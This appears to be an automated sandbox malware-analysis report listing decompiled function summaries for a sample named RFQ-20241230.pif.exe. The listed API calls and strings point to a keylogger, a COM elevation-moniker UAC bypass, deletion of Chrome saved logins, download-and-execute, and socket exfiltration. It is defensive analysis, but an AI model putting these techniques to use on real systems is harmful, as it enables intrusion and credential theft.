                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                            Strings
                            Similarity
                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                            • String ID: X[G
                            • API String ID: 1888522110-739899062
                            APIs
                            • _wcslen.LIBCMT ref: 00406788
                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                            Strings
                            Similarity
                            • API ID: Object_wcslen
                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                            • API String ID: 240030777-3166923314
                            APIs
                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                            • GetLastError.KERNEL32 ref: 00419945
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                            Similarity
                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                            • String ID:
                            • API String ID: 3587775597-0
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                            • String ID:
                            • API String ID: 2341273852-0
                            • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                            • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                            • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                            • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                            • GetLastError.KERNEL32 ref: 00409A1B
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                            • TranslateMessage.USER32(?), ref: 00409A7A
                            • DispatchMessageA.USER32(?), ref: 00409A85
                            Strings
                            • Keylogger initialization failure: error , xrefs: 00409A32
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                            • String ID: Keylogger initialization failure: error
                            • API String ID: 3219506041-952744263
                            • Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                            • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                            • Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                            • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                            APIs
                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseCreateLibraryLoadProcsend
                            • String ID: SHDeleteKeyW$Shlwapi.dll
                            • API String ID: 2127411465-314212984
                            • Opcode ID: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                            • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                            • Opcode Fuzzy Hash: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                            • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                            • GetLastError.KERNEL32 ref: 0040B261
                            Strings
                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                            • UserProfile, xrefs: 0040B227
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • API String ID: 2018770650-1062637481
                            • Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                            • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                            • Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                            • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                            • GetLastError.KERNEL32 ref: 00416B02
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3534403312-3733053543
                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                            APIs
                            • __EH_prolog.LIBCMT ref: 004089AE
                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                            • String ID:
                            • API String ID: 4043647387-0
                            • Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                            • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                            • Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                            • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ManagerStart
                            • String ID:
                            • API String ID: 276877138-0
                            • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                            • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                            • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                            • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$CreateFirstNext
                            • String ID: @CG$XCG$>G
                            • API String ID: 341183262-3030817687
                            • Opcode ID: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                            • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                            • Opcode Fuzzy Hash: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                            • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                            APIs
                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                            • String ID: PowrProf.dll$SetSuspendState
                            • API String ID: 1589313981-1420736420
                            • Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                            • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                            • Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                            • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                            APIs
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                            • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                            • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                            • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                            APIs
                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SETTINGS
                            • API String ID: 3473537107-594951305
                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                            • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                            • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                            • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                            • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                            • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                            • String ID:
                            • API String ID: 745075371-0
                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                            • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                            • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                            APIs
                            • __EH_prolog.LIBCMT ref: 00407A91
                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstH_prologNext
                            • String ID:
                            • API String ID: 1157919129-0
                            • Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                            • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                            • Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                            • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                            • _free.LIBCMT ref: 00448077
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 00448243
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                            • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                            • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadExecuteFileShell
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe$open
                            • API String ID: 2825088817-461175095
                            • Opcode ID: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                            • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                            • Opcode Fuzzy Hash: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                            • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNextsend
                            • String ID: x@G$x@G
                            • API String ID: 4113138495-3390264752
                            • Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                            • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                            • Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                            • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                            APIs
                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                              • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                              • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateInfoParametersSystemValue
                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                            • API String ID: 4127273184-3576401099
                            • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                            • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                            • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                            • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                            • _wcschr.LIBVCRUNTIME ref: 00450C01
                            • _wcschr.LIBVCRUNTIME ref: 00450C0F
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                            • String ID:
                            • API String ID: 4212172061-0
                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                            • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                            • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                            APIs
                            • __EH_prolog.LIBCMT ref: 00408DAC
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstH_prologNext
                            • String ID:
                            • API String ID: 301083792-0
                            • Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                            • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                            • Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                            • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
